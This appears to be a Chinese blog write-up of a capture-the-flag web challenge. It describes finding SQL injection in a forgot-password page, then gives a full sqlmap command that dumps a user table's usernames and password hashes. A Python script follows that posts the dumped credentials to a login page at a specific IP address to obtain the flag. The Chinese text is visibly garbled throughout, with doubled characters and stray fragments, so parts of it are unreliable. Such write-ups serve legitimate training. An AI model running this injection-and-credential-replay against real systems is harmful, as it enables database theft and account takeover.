根據(jù)題目提示在登錄及注冊中有漏洞
首先進入登錄界面,尋求漏洞,BP抓包,發(fā)現(xiàn)為明文傳輸,第一個想到爆破,但是爆破結(jié)果不盡人意,沒有任何用出;接下來進行SQL注入嘗試,但是倆個界面均沒有POST注入漏洞,正要放棄時,發(fā)現(xiàn)在登錄界面還有一個忘記密碼界面,嘗試在該界面進行SQL注入,
python2 sqlmap.py -r post.txt --dump -C "username,password" -T "user" -D "cetc004"
放進sqlmap直接跑出user表內(nèi)的內(nèi)容,如下圖所示
其中admin為測試時注冊數(shù)據(jù),第一個username為自身信息,后password則為其密碼,但是該md5加密后的數(shù)據(jù)無法在尋常網(wǎng)站上解密,故,構造一個python的請求報文腳本,來獲取flag
import requests
url = 'http://111.198.29.45:54376/login.php'
username = 'c3tlwDmIn23'
password = '2f8667f381ff50ced6a3edc259260ba9'
payloads = { 'username':username, 'password':password }
r = requests.post(url, data = payloads)
print (r.text)
獲取到的flag如下圖所示
————————————————
版權聲明:本文為CSDN博主「記憶湛藍天空」的原創(chuàng)文章,遵循 CC 4.0 BY-SA 版權協(xié)議,轉(zhuǎn)載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/qq_41941506/article/details/90381051